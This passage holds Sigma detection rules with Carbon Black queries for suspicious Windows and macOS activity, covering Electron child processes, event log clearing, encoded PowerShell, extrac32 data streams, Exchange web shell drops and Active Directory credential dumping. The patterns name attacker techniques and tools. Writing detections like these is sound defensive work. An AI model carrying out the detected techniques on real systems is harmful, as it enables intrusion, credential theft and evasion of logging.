Level: medium · Quality tier: Strong · Alert volume: Medium FP
Suspicious Electron Application Child Processes
Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic only · Rule id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8
carbon_black query
(ParentImage:\\chrome.exe OR ParentImage:\\discord.exe OR ParentImage:\\GitHubDesktop.exe OR ParentImage:\\keybase.exe OR ParentImage:\\msedge.exe OR ParentImage:\\msedgewebview2.exe OR ParentImage:\\msteams.exe OR ParentImage:\\slack.exe OR ParentImage:\\teams.exe) ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\whoami.exe OR Image:\\wscript.exe) OR (Image:\:\\ProgramData\\* OR Image:\:\\Temp\\* OR Image:\\AppData\\Local\\Temp\\* OR Image:\\Users\\Public\\* OR Image:\\Windows\\Temp\\*)) (-(ParentImage:\\Discord.exe Image:\\cmd.exe CommandLine:\\NVSMI\\nvidia\-smi.exe*))
view Sigma YAML
title: Suspicious Electron Application Child Processes
id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8
related:
    - id: 378a05d8-963c-46c9-bcce-13c7657eac99
      type: similar
status: test
description: |
    Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
references:
    - https://taggart-tech.com/quasar-electron/
    - https://github.com/mttaggart/quasar
    - https://positive.security/blog/ms-officecmd-rce
    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
    - https://lolbas-project.github.io/lolbas/Binaries/Teams/
    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/
    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-21
modified: 2024-07-12
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            # Add more electron based app to the list
            - '\chrome.exe' # Might require additional tuning
            - '\discord.exe'
            - '\GitHubDesktop.exe'
            - '\keybase.exe'
            - '\msedge.exe'
            - '\msedgewebview2.exe'
            - '\msteams.exe'
            - '\slack.exe'
            - '\teams.exe'
            # - '\code.exe' # Prone to a lot of FPs. Requires an additional baseline
    selection_child_image:
        Image|endswith:
            # Add more suspicious/unexpected paths
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\whoami.exe'
            - '\wscript.exe'
    selection_child_paths:
        Image|contains:
            # Add more suspicious/unexpected paths
            - ':\ProgramData\'
            - ':\Temp\'
            - '\AppData\Local\Temp\'
            - '\Users\Public\'
            - '\Windows\Temp\'
    filter_optional_discord:
        ParentImage|endswith: '\Discord.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains: '\NVSMI\nvidia-smi.exe'
    condition: selection_parent and 1 of selection_child_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
# Increase the level once FP rate is reduced (see status)
level: medium
Level: medium · Quality tier: Moderate · Alert volume: Low FP
Suspicious Email Delivered In Microsoft 365
Detects instances where an email, identified as malicious or suspicious by the Microsoft Defender for Office 365 (formerly ATP) engine, was delivered to a user's Inbox or Junk folder. It might indicate that a potential threat, such as a spearphishing attachment or links, has bypassed initial blocking mechanisms and reached an end-user, requiring further investigation and potential remediation.
Status: experimental · Author: Marco Pedrinazzi (@pedrinazziM) (InTheCyber) · ATT&CK mapping: sub-technique · Rule id: 3569aefd-e535-4391-8c18-24bd01a21eaf
carbon_black query
(Workload:ThreatIntelligence Operation:TIMailData Directionality:Inbound) (-DeliveryAction:Blocked)
view Sigma YAML
title: Suspicious Email Delivered In Microsoft 365
id: 3569aefd-e535-4391-8c18-24bd01a21eaf
status: experimental
description: |
    Detects instances where an email, identified as malicious or suspicious by the Microsoft Defender for Office 365 (formerly ATP) engine, was delivered to a user's Inbox or Junk folder.
    It might indicate that a potential threat, such as a spearphishing attachment or links, has bypassed initial blocking mechanisms and reached an end-user, requiring further investigation and potential remediation.
references:
    - https://learn.microsoft.com/en-us/defender-office-365/threat-explorer-real-time-detections-about
    - https://research.splunk.com/cloud/605cc93a-70e4-4ee3-9a3d-1a62e8c9b6c2/
    - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/e7250648cb16d4a497ae8737943bf010ea96d2e6/Defender%20For%20Cloud%20Apps/MaliciousEmailDeliveredInMailbox.md
author: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)
date: 2026-01-27
tags:
    - attack.initial-access
    - attack.t1566.001
    - attack.t1566.002
logsource:
    service: audit
    product: m365
detection:
    selection:
        Workload: 'ThreatIntelligence'
        Operation: 'TIMailData'
        Directionality: 'Inbound'
    filter_main_blocked:
        DeliveryAction: 'Blocked'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: medium
Level: medium · Quality tier: Moderate · Alert volume: High FP
Suspicious Eventlog Clear
Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
Status: test · Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 0f017df3-8f5a-414f-ad6b-24aff1128278
carbon_black query
(ScriptBlockText:Clear\-EventLog\ * OR ScriptBlockText:Remove\-EventLog\ * OR ScriptBlockText:Limit\-EventLog\ * OR ScriptBlockText:Clear\-WinEvent\ *) OR (ScriptBlockText:Eventing.Reader.EventLogSession* ScriptBlockText:ClearLog*) OR (ScriptBlockText:Diagnostics.EventLog* ScriptBlockText:Clear*)
view Sigma YAML
title: Suspicious Eventlog Clear
id: 0f017df3-8f5a-414f-ad6b-24aff1128278
related:
    - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5
      type: derived
status: test
description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
references:
    - https://twitter.com/oroneequalsone/status/1568432028361830402
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md
    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
    - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7
    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_
    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2022-09-12
modified: 2025-10-06
tags:
    - attack.defense-impairment
    - attack.t1685.005
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        - ScriptBlockText|contains:
              - 'Clear-EventLog '
              - 'Remove-EventLog '
              - 'Limit-EventLog '
              - 'Clear-WinEvent '
        - ScriptBlockText|contains|all:
              - 'Eventing.Reader.EventLogSession' # [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($_.LogName)
              - 'ClearLog'
        - ScriptBlockText|contains|all:
              - 'Diagnostics.EventLog'
              - 'Clear'
    condition: selection
falsepositives:
    - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate
level: medium
medium Moderate High FP
Suspicious Execution of InstallUtil Without Log
Uses the .NET InstallUtil.exe application in order to execute image without log
status test author frack113 ATT&CK tactic-only id d042284c-a296-4988-9be5-f424fadcc28c
carbon_black query
Image:\\InstallUtil.exe Image:Microsoft.NET\\Framework* (CommandLine:\/logfile=\ * CommandLine:\/LogToConsole=false*)
Sigma YAML
title: Suspicious Execution of InstallUtil Without Log
id: d042284c-a296-4988-9be5-f424fadcc28c
status: test
description: Uses the .NET InstallUtil.exe application in order to execute image without log
references:
    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
author: frack113
date: 2022-01-23
modified: 2022-02-04
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\InstallUtil.exe'
        Image|contains: 'Microsoft.NET\Framework'
        CommandLine|contains|all:
            - '/logfile= '
            - '/LogToConsole=false'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Suspicious Execution of Powershell with Base64
Commandline to launch powershell with a base64 payload
status test author frack113 ATT&CK sub-technique id fb843269-508c-4b76-8b8d-88679db22ce7
carbon_black query
((Image:\\powershell.exe OR Image:\\pwsh.exe) (CommandLine:\ \-e\ * OR CommandLine:\ \-en\ * OR CommandLine:\ \-enc\ * OR CommandLine:\ \-enco* OR CommandLine:\ \-ec\ *)) (-(CommandLine:\ \-Encoding\ * OR (ParentImage:C\:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\* OR ParentImage:\\gc_worker.exe*)))
Sigma YAML
title: Suspicious Execution of Powershell with Base64
id: fb843269-508c-4b76-8b8d-88679db22ce7
status: test
description: Commandline to launch powershell with a base64 payload
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets
    - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
    - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/
author: frack113
date: 2022-01-02
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - \powershell.exe
            - \pwsh.exe
        CommandLine|contains:
            - ' -e '
            - ' -en '
            - ' -enc '
            - ' -enco'
            - ' -ec '
    filter_encoding:
        CommandLine|contains: ' -Encoding '
    filter_azure:
        ParentImage|contains:
            - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
            - '\gc_worker.exe'
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious Execution of Shutdown
Use of the commandline to shutdown or reboot windows
status test author frack113 ATT&CK technique id 34ebb878-1b15-4895-b352-ca2eeb99b274
carbon_black query
Image:\\shutdown.exe (CommandLine:\/r\ * OR CommandLine:\/s\ *)
Sigma YAML
title: Suspicious Execution of Shutdown
id: 34ebb878-1b15-4895-b352-ca2eeb99b274
status: test
description: Use of the commandline to shutdown or reboot windows
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
author: frack113
date: 2022-01-01
tags:
    - attack.impact
    - attack.t1529
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\shutdown.exe'
        CommandLine|contains:
            - '/r '
            - '/s '
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious Execution of Shutdown to Log Out
Detects the rare use of the command line tool shutdown to logoff a user
status test author frack113 ATT&CK technique id ec290c06-9b6b-4338-8b6b-095c0f284f10
carbon_black query
Image:\\shutdown.exe CommandLine:\/l*
Sigma YAML
title: Suspicious Execution of Shutdown to Log Out
id: ec290c06-9b6b-4338-8b6b-095c0f284f10
status: test
description: Detects the rare use of the command line tool shutdown to logoff a user
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
author: frack113
date: 2022-10-01
tags:
    - attack.impact
    - attack.t1529
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\shutdown.exe'
        CommandLine|contains: '/l'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Suspicious Execution via macOS Script Editor
Detects when the macOS Script Editor utility spawns an unusual child process.
status test author Tim Rauch (rule), Elastic (idea) ATT&CK sub-technique id 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4
carbon_black query
ParentImage:\/Script\ Editor ((Image:\/curl OR Image:\/bash OR Image:\/sh OR Image:\/zsh OR Image:\/dash OR Image:\/fish OR Image:\/osascript OR Image:\/mktemp OR Image:\/chmod OR Image:\/php OR Image:\/nohup OR Image:\/openssl OR Image:\/plutil OR Image:\/PlistBuddy OR Image:\/xattr OR Image:\/sqlite OR Image:\/funzip OR Image:\/popen) OR (Image:python* OR Image:perl*))
Sigma YAML
title: Suspicious Execution via macOS Script Editor
id: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4
status: test
description: Detects when the macOS Script Editor utility spawns an unusual child process.
author: Tim Rauch (rule), Elastic (idea)
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685
    - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/
date: 2022-10-21
modified: 2022-12-28
logsource:
    category: process_creation
    product: macos
tags:
    - attack.defense-impairment
    - attack.t1566
    - attack.t1566.002
    - attack.initial-access
    - attack.t1059
    - attack.t1059.002
    - attack.t1204
    - attack.t1204.001
    - attack.execution
    - attack.persistence
    - attack.t1553
detection:
    selection_parent:
        ParentImage|endswith: '/Script Editor'
    selection_img:
        - Image|endswith:
              - '/curl'
              - '/bash'
              - '/sh'
              - '/zsh'
              - '/dash'
              - '/fish'
              - '/osascript'
              - '/mktemp'
              - '/chmod'
              - '/php'
              - '/nohup'
              - '/openssl'
              - '/plutil'
              - '/PlistBuddy'
              - '/xattr'
              - '/sqlite'
              - '/funzip'
              - '/popen'
        - Image|contains:
              - 'python'
              - 'perl'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Suspicious Extrac32 Alternate Data Stream Execution
Extract data from cab file and hide it in an alternate data stream
status test author frack113 ATT&CK sub-technique id 4b13db67-0c45-40f1-aba8-66a1a7198a1e
carbon_black query
(CommandLine:extrac32.exe* CommandLine:.cab*) CommandLine::[^\\\\]
Sigma YAML
title: Suspicious Extrac32 Alternate Data Stream Execution
id: 4b13db67-0c45-40f1-aba8-66a1a7198a1e
status: test
description: Extract data from cab file and hide it in an alternate data stream
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
author: frack113
date: 2021-11-26
modified: 2022-12-30
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - extrac32.exe
            - .cab
        CommandLine|re: ':[^\\]'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious Extrac32 Execution
Download or Copy file with Extrac32
status test author frack113 ATT&CK technique id aa8e035d-7be4-48d3-a944-102aec04400d
carbon_black query
(CommandLine:extrac32.exe* OR Image:\\extrac32.exe OR OriginalFileName:extrac32.exe) CommandLine:.cab* (CommandLine:\/C* OR CommandLine:\/Y* OR CommandLine:\ \\\\*)
Sigma YAML
title: Suspicious Extrac32 Execution
id: aa8e035d-7be4-48d3-a944-102aec04400d
status: test
description: Download or Copy file with Extrac32
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
author: frack113
date: 2021-11-26
modified: 2022-08-13
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_lolbas:
        - CommandLine|contains: extrac32.exe
        - Image|endswith: '\extrac32.exe'
        - OriginalFileName: 'extrac32.exe'
    selection_archive:
        CommandLine|contains: '.cab'
    selection_options:
        CommandLine|contains:
            - /C
            - /Y
            - ' \\\\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Suspicious File Characteristics Due to Missing Fields
Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
status test author Markus Neis, Sander Wiebing ATT&CK sub-technique id 9637e8a5-7131-4f7f-bdc7-2b05d8670c43
carbon_black query
((Description:? FileVersion:?) OR (Description:? Product:?) OR (Description:? Company:?)) Image:\\Downloads\\*
Sigma YAML
title: Suspicious File Characteristics Due to Missing Fields
id: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43
status: test
description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
references:
    - https://securelist.com/muddywater/88059/
    - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection
author: Markus Neis, Sander Wiebing
date: 2018-11-22
modified: 2022-10-09
tags:
    - attack.execution
    - attack.t1059.006
logsource:
    product: windows
    category: process_creation
detection:
    selection1:
        Description: '\?'
        FileVersion: '\?'
    selection2:
        Description: '\?'
        Product: '\?'
    selection3:
        Description: '\?'
        Company: '\?'
    folder:
        Image|contains: '\Downloads\'
    condition: (selection1 or selection2 or selection3) and folder
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious File Created In PerfLogs
Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id bbb7e38c-0b41-4a11-b306-d2a457b7ac2b
carbon_black query
TargetFilename:C\:\\PerfLogs\\* (TargetFilename:.7z OR TargetFilename:.bat OR TargetFilename:.bin OR TargetFilename:.chm OR TargetFilename:.dll OR TargetFilename:.exe OR TargetFilename:.hta OR TargetFilename:.lnk OR TargetFilename:.ps1 OR TargetFilename:.psm1 OR TargetFilename:.py OR TargetFilename:.scr OR TargetFilename:.sys OR TargetFilename:.vbe OR TargetFilename:.vbs OR TargetFilename:.zip)
Sigma YAML
title: Suspicious File Created In PerfLogs
id: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b
status: test
description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
references:
    - Internal Research
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|startswith: 'C:\PerfLogs\'
        TargetFilename|endswith:
            - '.7z'
            - '.bat'
            - '.bin'
            - '.chm'
            - '.dll'
            - '.exe'
            - '.hta'
            - '.lnk'
            - '.ps1'
            - '.psm1'
            - '.py'
            - '.scr'
            - '.sys'
            - '.vbe'
            - '.vbs'
            - '.zip'
    condition: selection
falsepositives:
    - Unlikely
level: medium
medium Strong Medium FP
Suspicious File Drop by Exchange
Detects suspicious file type dropped by an Exchange component in IIS
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 6b269392-9eba-40b5-acb6-55c882b20ba6
carbon_black query
(Image:\\w3wp.exe CommandLine:MSExchange*) (TargetFilename:.aspx OR TargetFilename:.asp OR TargetFilename:.ashx OR TargetFilename:.ps1 OR TargetFilename:.bat OR TargetFilename:.exe OR TargetFilename:.dll OR TargetFilename:.vbs)
Sigma YAML
title: Suspicious File Drop by Exchange
id: 6b269392-9eba-40b5-acb6-55c882b20ba6
related:
    - id: bd1212e5-78da-431e-95fa-c58e3237a8e6
      type: similar
status: test
description: Detects suspicious file type dropped by an Exchange component in IIS
references:
    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
author: Florian Roth (Nextron Systems)
date: 2022-10-04
tags:
    - attack.persistence
    - attack.t1190
    - attack.initial-access
    - attack.t1505.003
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\w3wp.exe'
        CommandLine|contains: 'MSExchange'
    selection_types:
        TargetFilename|endswith:
            - '.aspx'
            - '.asp'
            - '.ashx'
            - '.ps1'
            - '.bat'
            - '.exe'
            - '.dll'
            - '.vbs'
    condition: all of selection*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious File Write to Webapps Root Directory
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 89c42960-f244-4dad-9151-ae9b1a3287a2
carbon_black query
(Image:\\dotnet.exe OR Image:\\w3wp.exe OR Image:\\java.exe) (TargetFilename:\\apache* OR TargetFilename:\\tomcat*) TargetFilename:\\webapps\\ROOT\\* TargetFilename:.jsp
Sigma YAML
title: Suspicious File Write to Webapps Root Directory
id: 89c42960-f244-4dad-9151-ae9b1a3287a2
status: experimental
description: |
    Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
    This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
references:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-20
tags:
    - attack.persistence
    - attack.t1505.003
    - attack.initial-access
    - attack.t1190
logsource:
    product: windows
    category: file_event
detection:
    # Add more suspicious processes or paths or extensions as needed
    selection_susp_img:
        Image|endswith:
            - '\dotnet.exe'
            - '\w3wp.exe'
            - '\java.exe'
    selection_servers:
        TargetFilename|contains:
            - '\apache'
            - '\tomcat'
    selection_path:
        TargetFilename|contains: '\webapps\ROOT\'
    selection_susp_extensions:
        TargetFilename|endswith: '.jsp'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious Files in Default GPO Folder
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
status test author elhoim ATT&CK sub-technique id 5f87308a-0a5b-4623-ae15-d8fa1809bc60
carbon_black query
TargetFilename:\\Policies\\\{31B2F340\-016D\-11D2\-945F\-00C04FB984F9\}\\* (TargetFilename:.dll OR TargetFilename:.exe)
Sigma YAML
title: Suspicious Files in Default GPO Folder
id: 5f87308a-0a5b-4623-ae15-d8fa1809bc60
status: test
description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
references:
    - https://redcanary.com/blog/intelligence-insights-november-2021/
author: elhoim
date: 2022-04-28
tags:
    - attack.stealth
    - attack.t1036.005
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\'
        TargetFilename|endswith:
            - '.dll'
            - '.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
status test author frack113 ATT&CK sub-technique id d75d6b6b-adb9-48f7-824b-ac2e786efe1f
carbon_black query
CommandLine:FromBase64String* CommandLine:MemoryStream* CommandLine:H4sI*
Sigma YAML
title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
related:
    - id: df69cb1d-b891-4cd9-90c7-d617d90100ce
      type: similar
status: test
description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
author: frack113
date: 2022-12-23
tags:
    - attack.command-and-control
    - attack.t1132.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'FromBase64String'
            - 'MemoryStream'
            - 'H4sI'
    condition: selection
falsepositives:
    - Legitimate administrative script
level: medium
medium Moderate High FP
Suspicious FromBase64String Usage On Gzip Archive - Ps Script
Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
status test author frack113 ATT&CK sub-technique id df69cb1d-b891-4cd9-90c7-d617d90100ce
carbon_black query
ScriptBlockText:FromBase64String* ScriptBlockText:MemoryStream* ScriptBlockText:H4sI*
Sigma YAML
title: Suspicious FromBase64String Usage On Gzip Archive - Ps Script
id: df69cb1d-b891-4cd9-90c7-d617d90100ce
related:
    - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
      type: similar
status: test
description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
author: frack113
date: 2022-12-23
tags:
    - attack.command-and-control
    - attack.t1132.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'FromBase64String'
            - 'MemoryStream'
            - 'H4sI'
    condition: selection
falsepositives:
    - Legitimate administrative script
level: medium
medium Moderate High FP
Suspicious Get-ADReplAccount
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
status test author frack113 ATT&CK sub-technique id 060c3ef1-fd0a-4091-bf46-e7d625f60b73
carbon_black query
ScriptBlockText:Get\-ADReplAccount* ScriptBlockText:\-All\ * ScriptBlockText:\-Server\ *
Sigma YAML
title: Suspicious Get-ADReplAccount
id: 060c3ef1-fd0a-4091-bf46-e7d625f60b73
status: test
description: |
    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.
    These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
references:
    - https://www.powershellgallery.com/packages/DSInternals
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount
author: frack113
date: 2022-02-06
tags:
    - attack.credential-access
    - attack.t1003.006
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - Get-ADReplAccount
            - '-All '
            - '-Server '
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium
medium Moderate High FP
Suspicious GetTypeFromCLSID ShellExecute
Detects suspicious Powershell code that execute COM Objects
status test author frack113 ATT&CK sub-technique id 8bc063d5-3a3a-4f01-a140-bc15e55e8437
carbon_black query
ScriptBlockText:\:\:GetTypeFromCLSID\(* ScriptBlockText:.ShellExecute\(*
Sigma YAML
title: Suspicious GetTypeFromCLSID ShellExecute
id: 8bc063d5-3a3a-4f01-a140-bc15e55e8437
status: test
description: Detects suspicious Powershell code that execute COM Objects
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object
author: frack113
date: 2022-04-02
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - '::GetTypeFromCLSID('
            - '.ShellExecute('
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium
medium Moderate Medium FP
Suspicious Git Clone
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id aef9d1f1-7396-4e92-a927-4567c7a495c1
carbon_black query
((Image:\\git.exe OR Image:\\git\-remote\-https.exe) OR OriginalFileName:git.exe) (CommandLine:\ clone\ * OR CommandLine:git\-remote\-https\ *) (CommandLine:exploit* OR CommandLine:Vulns* OR CommandLine:vulnerability* OR CommandLine:RemoteCodeExecution* OR CommandLine:Invoke\-* OR CommandLine:CVE\-* OR CommandLine:poc\-* OR CommandLine:ProofOfConcept* OR CommandLine:proxyshell* OR CommandLine:log4shell* OR CommandLine:eternalblue* OR CommandLine:eternal\-blue* OR CommandLine:MS17\-*)
Sigma YAML
title: Suspicious Git Clone
id: aef9d1f1-7396-4e92-a927-4567c7a495c1
status: test
description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2023-01-10
tags:
    - attack.reconnaissance
    - attack.t1593.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\git.exe'
              - '\git-remote-https.exe'
        - OriginalFileName: 'git.exe'
    selection_cli:
        CommandLine|contains:
            - ' clone '
            - 'git-remote-https '
    selection_keyword:
        CommandLine|contains:
            # Add more suspicious keywords
            - 'exploit'
            - 'Vulns'
            - 'vulnerability'
            - 'RemoteCodeExecution'
            - 'Invoke-'
            - 'CVE-'
            - 'poc-'
            - 'ProofOfConcept'
            # Add more vuln names
            - 'proxyshell'
            - 'log4shell'
            - 'eternalblue'
